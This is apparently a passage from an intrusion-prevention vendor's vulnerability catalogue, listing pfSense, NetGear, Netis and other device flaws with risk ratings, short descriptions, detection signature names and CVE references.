Description:

A command injection vulnerability has been reported in Netgate pfSense. The vulnerability is due to improper validation of values used by the diag_packet_capture.php file used in command lines. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of arbitrary command under the security context of the root user.

Situation:

HTTP_CRL-Netgate-Pfsense-Diag_packet_capture.php-Command-Injection

References:

CVE-2023-48123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48123

Netgate-Pfsense-Diag_Routes-Command-Injection

About this vulnerability:

A vulnerability in Netgate pfSense CE

Risk:

Moderate

First detected in:

sgpkg-ips-1443-5242

Last changed:

sgpkg-ips-1443-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

Improper validation of parameters sent to the route diagnostic web page diag_routes.php causes a command injection vulnerability in PfSense. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Netgate-Pfsense-Diag_Routes-Command-Injection

References:

CVE-2021-41282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41282

Netgate-Pfsense-Firewall_alias.php-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Netgate pfSense CE

Risk:

Moderate

First detected in:

sgpkg-ips-1570-5242

Last changed:

sgpkg-ips-1570-5242

Platform:

Generic

Software:

Netgate pfSense

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for Netgate pfSense. This vulnerability is due to improper input validation on the URLs and URL aliases in firewall_alias.php. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-Netgate-Pfsense-Firewall_alias.php-Stored-Cross-Site-Scripting

References:

CVE-2022-29273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29273

Netgate-Pfsense-Haproxy_listeners_Edit.php-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Netgate pfSense

Risk:

Moderate

First detected in:

sgpkg-ips-1173-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

There has been reported a stored cross-site scripting vulnerability in Netgate pfSense. Successful exploitation could lead in arbitrary script execution in the target user's browser.

Situation:

HTTP_CRL-Netgate-Pfsense-Haproxy_listeners_Edit.php-Stored-Cross-Site-Scripting

References:

CVE-2019-8953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8953

Netgate-Pfsense-Pfblockerng-Host-Command-Injection

About this vulnerability:

A vulnerability in Netgate pfSense pfBlockerNG

Risk:

High

First detected in:

sgpkg-ips-1506-5242

Last changed:

sgpkg-ips-1506-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

A command injection vulnerability exists in Netgate pfSense. The vulnerability is due to improper validation of Host HTTP header sent to plugin pfBlockerNG. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the target server. Successfully exploiting this vulnerability could result in OS command injection in the context of root.

Situation:

HTTP_CSH-Netgate-Pfsense-Pfblockerng-Host-Command-Injection

References:

CVE-2022-31814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31814

Netgate-Pfsense-Restore_rrddata-Command-Injection

About this vulnerability:

A vulnerability in Netgate pfSense

Risk:

High

First detected in:

sgpkg-ips-1579-5242

Last changed:

sgpkg-ips-1678-5242

Platform:

Generic

Software:

Netgate pfSense

Type:

Input Validation

Description:

A command execution vulnerability has been reported for Netgate pfSense. This vulnerability is due to improper input validation for the restore_rrddata function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in OS command injection under the context of root.

Situation:

HTTP_CS-Netgate-Pfsense-Restore_rrddata-Command-Injection
File-TextId_Netgate-Pfsense-Restore_rrddata-Command-Injection

References:

CVE-2023-27253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27253

Netgate-Pfsense-Services_wol_Edit.php-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Netgate pfSense

Risk:

Moderate

First detected in:

sgpkg-ips-1346-5242

Last changed:

sgpkg-ips-1346-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

There exists a stored cross-site scripting vulnerability in Netgate pfSense. Successful exploitation could lead in arbitrary script code execution in the target user's browser.

Situation:

HTTP_CRL-Netgate-Pfsense-Services_wol_Edit.php-Stored-Cross-Site-Scripting

References:

CVE-2021-27933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27933

Netgate-Pfsense-Status-Command-Injection

About this vulnerability:	A vulnerability in PfSense
Risk:	Moderate
First detected in:	sgpkg-ips-1520-5242
Last changed:	sgpkg-ips-1520-5242
Platform:	Generic
Software:	PfSense
Type:	Input Validation
Description:	Improper sanitization of the name parameter in requests sent to firewall_aliases_edit.php causes a command injection vulnerability in NetGate pfSense. A successful exploit allows an attacker to execute arbitrary commands on the target system with root privileges.
Situation:	HTTP_CRL-Netgate-Pfsense-Status-Command-Injection

Netgate-Pfsense-Stored-Cross-Site-Scripting-CVE-2024-46538

About this vulnerability:

A vulnerability in Netgate pfSense

Risk:

High

First detected in:

sgpkg-ips-1818-5242

Last changed:

sgpkg-ips-1818-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for Netgate pfSense. This vulnerability is due to improper input validation on the members parameter in interfaces_groups_edit.php. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-Netgate-Pfsense-Stored-Cross-Site-Scripting-CVE-2024-46538

References:

CVE-2024-46538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46538

Netgate-Pfsense-System_Advanced_misc.php-Command-Injection

About this vulnerability:

A vulnerability in Netgate pfSense

Risk:

Moderate

First detected in:

sgpkg-ips-1123-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

There has been reported a command injection vulnerability in the administrative interface of Netgate pfSense. This vulnerability can be exploited by an authenticated remote attacker. Successful exploitation leads in arbitrary code execution.

Situation:

HTTP_CRL-Netgate-Pfsense-System_Advanced_misc.php-Command-Injection

References:

CVE-2018-4021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4021

NetGear-Administrator-Password-Disclosure

About this vulnerability:

A vulnerability in NetGear

Risk:

High

First detected in:

sgpkg-ips-1127-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGear

Type:

Malfunction

Description:

A vulnerability in NetGear that allows remote attackers to collect the admin user password by passing the token generated from unauth.cgi to passwordrecovered.cgi.

Situation:

HTTP_CSU-NetGear-Administrator-Password-Disclosure

References:

CVE-2017-5521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521

NetGear-DGN1000-Remote-Command-Execution

About this vulnerability:	A vulnerability in Netgear DGN1000
Risk:	High
First detected in:	sgpkg-ips-1202-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	NetGear
Type:	Malfunction
Description:	There exists a remote code execution vulnerability in the firmware of NetGear DGN1000 device. Successful exploitation could lead in arbitrary code execution.
Situation:	HTTP_CRL-NetGear-DGN1000-Remote-Command-Execution

NetGear-DGN2200-dnslookup.cgi-Command-Injection

About this vulnerability:

A NetGear DGN2200 dnslookup.cgi Command Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-1025-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGear

Type:

Input Validation

Description:

A vulnerability in Netgear DGN2200 routers, versions 1-4, which allows remote attackers to execute arbitrary commands by sending a specially crafted POST request.

Situation:

HTTP_CS-NetGear-DGN2200-dnslookup.cgi-Command-Injection

References:

CVE-2017-6334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6334

NetGear-DGN2200-Remote-Command-Execution-CVE-2017-6077

About this vulnerability:

A vulnerability in Netgear DGN2200

Risk:

High

First detected in:

sgpkg-ips-1443-5242

Last changed:

sgpkg-ips-1443-5242

Platform:

Generic

Software:

NetGear

Type:

Input Validation

Description:

There exists a remote command execution vulnerability in the firmware of NetGear DGN2200 device. Successful exploitation can allow an authenticated attacker to execute arbitrary OS commands.

Situation:

HTTP_CRL-NetGear-DGN2200-Remote-Command-Execution-CVE-2017-6077

References:

CVE-2017-6077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077

NetGear-NMS300-Configfilecontroller-Addconfigfile-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1348-5242

Last changed:

sgpkg-ips-1348-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Directory Traversal

Description:

Improper validation of the parameters in the addConfigFile method of the ConfigFileController class causes a path traversal vulnerability which allows an attacker to delete arbitrary files on the target system.

Situation:

HTTP_CRL-NetGear-NMS300-Configfilecontroller-Addconfigfile-Arbitrary-File-Deletion

References:

CVE-2021-27275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27275

NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion

About this vulnerability:	A vulnerability in NetGear ProSAFE NMS300
Risk:	Moderate
First detected in:	sgpkg-ips-1350-5242
Last changed:	sgpkg-ips-1350-5242
Platform:	Generic
Software:	NetGear NMS300
Type:	Directory Traversal
Description:	Improper validation of the parameters in the addConfigFile method of the ConfigImageController class causes a vulnerability in NetGear NMS300. A successful exploit allows an attacker to delete arbitrary files on the target system and to cause a denial of service condition.
Situation:	HTTP_CRL-NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion

NetGear-NMS300-Fileuploadutils-Directory-Traversal

About this vulnerability:	A vulnerability in Netgear ProSAFE NMS300
Risk:	Moderate
First detected in:	sgpkg-ips-1353-5242
Last changed:	sgpkg-ips-1353-5242
Platform:	Generic
Software:	NetGear NMS300
Type:	Directory Traversal
Description:	Insufficient validation of paths in HTTP POST requests in the file upload functions causes a path traversal vulnerability in Netgear NMS300. A successful exploit allows an attacker to upload and possibly execute arbitrary files on the target system.
Situation:	HTTP_CS-NetGear-NMS300-Fileuploadutils-Directory-Traversal

NetGear-NMS300-Management-System-Arbitrary-File-Read-CVE-2016-1525

About this vulnerability:

A vulnerability in NetGear NMS300

Risk:

High

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Directory Traversal

Description:

A path traversal vulnerability in NetGear NMS300, versions 1.5.0.11 and before, which allows authenticated remote attackers to read arbitrary files.

Situation:

HTTP_CRL-NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion

References:

CVE-2016-1525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1525

NetGear-NMS300-Mfileuploadcontroller-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1352-5242

Last changed:

sgpkg-ips-1352-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Input Validation

Description:

Improper validation of request contents causes an unrestricted file upload vulnerability in Netgear NMS300. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-NetGear-NMS300-Mfileuploadcontroller-Unrestricted-File-Upload

References:

CVE-2021-27274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27274

NetGear-Orbi-Router-Rbr750-Command-Execution-CVE-2022-37337

About this vulnerability:

A vulnerability in NetGear Orbi Router RBR750

Risk:

High

First detected in:

sgpkg-ips-1570-5242

Last changed:

sgpkg-ips-1570-5242

Platform:

Generic

Software:

NetGear Orbi

Type:

Input Validation

Description:

A command execution vulnerability has been reported in NetGear Orbi Router model RBR750. A remote attacker with valid user credentials may leverage this vulnerability to execute arbitrary code via a crafted HTTP request. If the Orbi mesh network is unprotected, authentication is not required for exploitation.

Situation:

HTTP_CRL-NetGear-Orbi-Router-Rbr750-Command-Execution-CVE-2022-37337

References:

CVE-2022-37337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37337

NetGear-Orbi-Satellite-RBS750-Command-Execution-CVE-2022-36429

About this vulnerability:

A vulnerability in NetGear Orbi Satellite

Risk:

High

First detected in:

sgpkg-ips-1595-5242

Last changed:

sgpkg-ips-1595-5242

Platform:

Generic

Software:

NetGear Orbi

Type:

Malfunction

Description:

A command execution vulnerability has been reported in NetGear Orbi Satellite, model RBS750 4.6.8.5. A remote attacker with valid user credentials may leverage this vulnerability to enable a hidden telnet service via a crafted JSON object.

Situation:

File-Text_NetGear-Orbi-Satellite-RBS750-Command-Execution-CVE-2022-36429

References:

CVE-2022-36429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36429

NetGear-ProSafe-NMS300-Clearalertbyids-SQL-Injection

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1662-5242

Last changed:

sgpkg-ips-1662-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Netgear ProSAFE NMS300. This vulnerability is due to improper input validation in the clearAlertByIds function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-Clearalertbyids-SQL-Injection

References:

CVE-2023-44449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44449

NetGear-ProSafe-NMS300-CVE-2023-38095-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Directory Traversal

Description:

An unrestricted file upload vulnerability exists in Netgear ProSAFE NMS300. The vulnerability is due to improper validation of the uploaded file in the MFileUploadController class. A remote attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation would result in the code execution under the security context of SYSTEM.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-CVE-2023-38095-Arbitrary-File-Upload

References:

CVE-2023-38095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38095

NetGear-ProSafe-NMS300-CVE-2024-5247-Uploadservlet-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

High

First detected in:

sgpkg-ips-1737-5242

Last changed:

sgpkg-ips-1737-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Input Validation

Description:

An unrestricted file upload vulnerability has been reported for Netgear ProSAFE NMS300. This vulnerability is due to improper input validation in the UpLoadServlet class. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file creation or, in the worst case, remote code execution in the context of SYSTEM.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload

References:

CVE-2024-5247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5247

NetGear-ProSafe-NMS300-Getnodesbytopologymapsearch-SQL-Injection

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1618-5242

Last changed:

sgpkg-ips-1663-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Input Validation

Description:

Improper input validation for the getNodesByTopologyMapSearch component causes an SQL injection vulnerability in Netgear ProSAFE NMS300. A successful exploit allows an attacker to execute arbitary SQL and possibly even arbitrary code on the target system. This situation also covers attempts to exploit CVE-2023-44450, which was issued to address the failed patch of CVE-2023-38099.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-Getnodesbytopologymapsearch-SQL-Injection

References:

CVE-2023-38099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38099

NetGear-ProSafe-NMS300-Mibcontroller-Realname-Directory-Traversal

About this vulnerability:

A vulnerability in NetGear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1377-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Directory Traversal

Description:

Improper validation of the realName parameter in MibController class causes a vulnerability in NetGear NMS300. A successful exploit allows an attacker to cause a denial of service condition.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-Mibcontroller-Realname-Directory-Traversal

References:

CVE-2021-27276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27276

NetGear-ProSafe-NMS300-Myhandlerinterceptor-Authentication-Bypass

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1646-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Input Validation

Description:

Improper validation of request-URI in MyHandlerInterceptor class causes an authentication bypass vulnerability in Netgear NMS300. A succesful exploitation allows an attacker to gain access to restricted functionality on the target software.

Situation:

HTTP_CSU-NetGear-ProSafe-NMS300-Myhandlerinterceptor-Authentication-Bypass

References:

CVE-2023-38096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38096

NetGear-ProSafe-NMS300-Reporttemplatecontroller-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in NetGear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Directory Traversal

Description:

Improper validation of the path parameter in the ReportTemplateController class of the management application causes an arbitrary deletion vulnerability in NetGear ProSAFE NMS300. A successful exploit allows a remote attacker to delete arbitrary files on the target system and cause a denial of service condition.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-Reporttemplatecontroller-Arbitrary-File-Deletion

References:

CVE-2021-27272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27272

NetGear-ProSafe-NMS300-Savenodelabel-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1689-5242

Last changed:

sgpkg-ips-1689-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for Netgear ProSAFE NMS300. This vulnerability is due to improper input validation in the saveNodeLabel method. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-Savenodelabel-Stored-Cross-Site-Scripting

References:

CVE-2023-50231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50231

NetGear-ProSafe-NMS300-Settingconfigcontroller-Command-Injection

About this vulnerability:

A vulnerability in NetGear ProSAFE NMS300

Risk:

Moderate

First detected in:

sgpkg-ips-1341-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Input Validation

Description:

Improper validation of user-sent parameters in SettingConfigController class causes a command injection vulnerability in NetGearn NMS300. A successful exploit allows an attacker to execute arbitrarty commands on the target with system privileges.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-Settingconfigcontroller-Command-Injection

References:

CVE-2021-27273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27273

NetGear-ProSafe-NMS300-Uploadservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

High

First detected in:

sgpkg-ips-1777-5242

Last changed:

sgpkg-ips-1777-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported for Netgear ProSAFE NMS300. This vulnerability is due to improper input validation in the UpLoadServlet class. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of SYSTEM.

Situation:

HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Directory-Traversal

References:

CVE-2024-5505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5505

NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Netgear ProSAFE NMS300

Risk:

High

First detected in:

sgpkg-ips-1641-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Input Validation

Description:

An unrestricted file upload vulnerability exists in Netgear ProSAFE NMS300. The vulnerability is due to improper validation of the uploaded file in the UpLoadServlet class. A remote, authenticated attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation would result in the code execution under the security context of SYSTEM.

Situation:

HTTP_CS-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload

References:

CVE-2023-38098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38098

NetGear-ProSafe-Plus-Improper-Access-Control-CVE-2020-26919

About this vulnerability:

A vulnerability in NetGear ProSAFE

Risk:

High

First detected in:

sgpkg-ips-1403-5242

Last changed:

sgpkg-ips-1403-5242

Platform:

Generic

Software:

NetGear

Type:

Insecure Configuration

Description:

NetGear ProSAFE Plus switches JGS516PE and GS116Ev2 with firmware version prior to 2.6.0.43 could allow unauthenticated attackers to execute arbitrary commands due to improper access controls.

Situation:

HTTP_CRL-NetGear-ProSafe-Plus-Improper-Access-Control-CVE-2020-26919

References:

CVE-2020-26919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26919

NetGear-R6700v3-Unauthenticated-Lan-Admin-Password-Reset

About this vulnerability:

A vulnerability in NetGear R6700v3 routers.

Risk:

High

First detected in:

sgpkg-ips-1422-5242

Last changed:

sgpkg-ips-1422-5242

Platform:

Generic

Software:

NetGear

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd) of NetGear R6700v3 routers, firmware versions before V1.0.4.94, which allows remote attackers to reset the Admin password back to its factory default of 'password'.

Situation:

HTTP_CS-NetGear-R6700v3-Unauthenticated-Lan-Admin-Password-Reset

References:

CVE-2020-10924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10924

NetGear-R7000-And-R6400-Cgi-Bin-Command-Injection

About this vulnerability:

An attempt to exploit a NetGear R7000 and R6400 cgi-bin Command Injection vulnerability detected

Risk:

High

First detected in:

sgpkg-ips-980-5242

Last changed:

sgpkg-ips-1770-5242

Platform:

Linux

Software:

NetGear

Type:

Code Injection

Description:

A vulnerability in NetGear R7000 and R6400 , firmware version 1.0.7.2_1.1.93, which allows remote attackers to execute arbitrary commands via the path info to cgi-bin.

Situation:

HTTP_CSU-Cgi-Bin-Command-Injection
HTTP_CSU-NetGear-R7000-And-R6400-Command-Injection-Enable-Telnet

References:

CVE-2016-6277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6277

NetGear-RAX43-Command-Injection-CVE-2021-20167

About this vulnerability:

A vulnerability in NetGear RAX43 router

Risk:

High

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Generic

Software:

NetGear

Type:

Input Validation

Description:

A command injection vulnerability has been reported in NetGear RAX43 router firmware.

Situation:

HTTP_CRL-NetGear-RAX43-Command-Injection-CVE-2021-20167

References:

CVE-2021-20167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20167

NetGear-ReadyNAS-Perl-Code-Injection

About this vulnerability:

A NetGear ReadyNAS Perl Code Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NETGEAR ReadyNAS

Type:

Code Injection

Description:

A vulnerability in NETGEAR ReadyNAS, firmware versions 4.2.23 and 4.1.11, which allows remote attackers to execute arbitrary Perl code via a vrafted request.

Situation:

HTTP_CSU-NetGear-ReadyNAS-Perl-Code-Injection

References:

CVE-2013-2751
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2751

OSVDB-98826
http://www.osvdb.org/98826

NetGear-SSL312-Cgi-Binary-DoS

About this vulnerability:

A Denial of Service vulnerability in NetGear

Risk:

Low

First detected in:

sgpkg-ips-288-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGear SSL312

Type:

Buffer Overflow

Description:

Denial of Service vulnerability exists in NetGear SSL312. The vulnerability can be triggered by sending a directory traversal request into the admin http/https interface

Situation:

HTTP_CSU-NetGear-SSL312-Cgi-DoS

References:

CVE-2009-0680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0680

BID-33675
http://www.securityfocus.com/bid/33675

NetGear-Wireless-Access-Point-Remote-Code-Execution-CVE-2016-1555

About this vulnerability:

A vulnerability in NetGear

Risk:

High

First detected in:

sgpkg-ips-1482-5242

Last changed:

sgpkg-ips-1482-5242

Platform:

Generic

Software:

NetGear

Type:

Input Validation

Description:

NeatGear wireless access points WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, WNDAP660, and WN604 include various web pages that can allow an unauthenticated attacker to execute arbitrary commands.

Situation:

HTTP_CRL-NetGear-Wireless-Access-Point-Remote-Code-Execution-CVE-2016-1555

References:

CVE-2016-1555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1555

NetGear-WNAP210-Remote-Password-Disclosure

About this vulnerability:	A vulnerability in NetGeat WNAP210
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	NetGear WNAP210
Type:	Malfunction
Description:	There is a vulnerability in NetGear WNAP210 which may allow a remote unauthenticated attacker to retrieve the device's administrator password.
Situation:	HTTP_CSU-NetGear-WNAP210-And-WNDAP350-Remote-Password-Disclosure

NetGear-WNDAP350-Remote-Password-Disclosure

About this vulnerability:	A vulnerability in NetGeat WNDAP350
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	NetGear WNDAP350
Type:	Malfunction
Description:	The Netgear WNDAP350 suffers from unauthorized information disclosure which allows a remote attacker to steal the administrator's credentials and other configuration information.
Situation:	HTTP_CSU-NetGear-WNDAP350-Remote-Password-Disclosure HTTP_CSU-NetGear-WNAP210-And-WNDAP350-Remote-Password-Disclosure

Netikus-EventSentry-SNMP-Trap-Cross-Site-Scripting-CVE-2016-5077

About this vulnerability:

A vulnerability in Netikus EventSentry

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Netikus EventSentry

Type:

Cross-site Scripting

Description:

A cross-site scripting vulnerability has been reported in Netikus EventSentry versions before 3.2.1.44. An unauthenticated attacker can use this vulnerability to execute arbitrary script content in the EventSentry web console via crafted SNMP trap messages.

Situation:

File-Text_NetIQ-Security-Solutions-For-Iseries-Safeshellexecute-Stack-Buffer-Overflow

References:

CVE-2016-5077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5077

NetIQ-Security-Solutions-For-Iseries-Safeshellexecute-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in NetIQ Security Solutions for iSeries

Risk:

Low

First detected in:

sgpkg-ips-664-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetIQ Security Solutions for iSeries

Type:

Buffer Overflow

Description:

A remote code execution vulnerability has been reported in NetIQ Security Solutions for ISeries. The vulnerability is due to a stack buffer overflow in the NetIQExecObject.NetIQExec ActiveX Control when processing parameters to the SafeShellExecute function. A remote attacker can exploit this vulnerability by enticing a user to visit a maliciously crafted web page. This can lead to code execution in the context of the affected user.

Situation:

References:

CVE-2015-0795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0795

Netis-Router-Backdoor

About this vulnerability:	A known backdoor in Netis Routers
Risk:	High
First detected in:	sgpkg-ips-894-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	There exists a hardcoded password in Netis, Netcore, routers which allows remote attackers to bypass the device security and run arbitrary code.
Situation:	Generic_UDP-Netis-Router-Backdoor

Netis-Router-MW5360-Unauthenticated-RCE

About this vulnerability:

An attempt to exploit a vulnerability in the Netis MW5360 detected

Risk:

High

First detected in:

sgpkg-ips-1748-5242

Last changed:

sgpkg-ips-1748-5242

Platform:

Linux

Software:

Netis

Type:

Input Validation

Description:

A vulnerability in the the Netis MW5360 router, versions V1.0.1.3442 and before, which allows remote attackers to execute arbitrary commands via the password parameter, due to insufficient input validation.

Situation:

HTTP_CRL-Netis-Router-MW5360-Unauthenticated-RCE

References:

CVE-2024-22729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22729

Netis-Router-Unauthenticated-Password-Change

About this vulnerability:

A vulnerability in Netis routers

Risk:

Moderate

First detected in:

sgpkg-ips-1824-5242

Last changed:

sgpkg-ips-1824-5242

Platform:

Generic

Software:

Netis

Type:

Input Validation

Description:

Improper validation of requests to API endpoints causes an unauthenticated password change vulnerability in Netis routers. A successful exploitation allows an attacker to access privileged functionality on the target system.

Situation:

HTTP_CRL-Netis-Router-Unauthenticated-Password-Change

References:

CVE-2024-48456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48456

Netis-WF2419-Remote-Code-Execution-CVE-2019-19356

About this vulnerability:

A vulnerability in Netis WF2419

Risk:

High

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

Generic

Software:

Netis

Type:

Input Validation

Description:

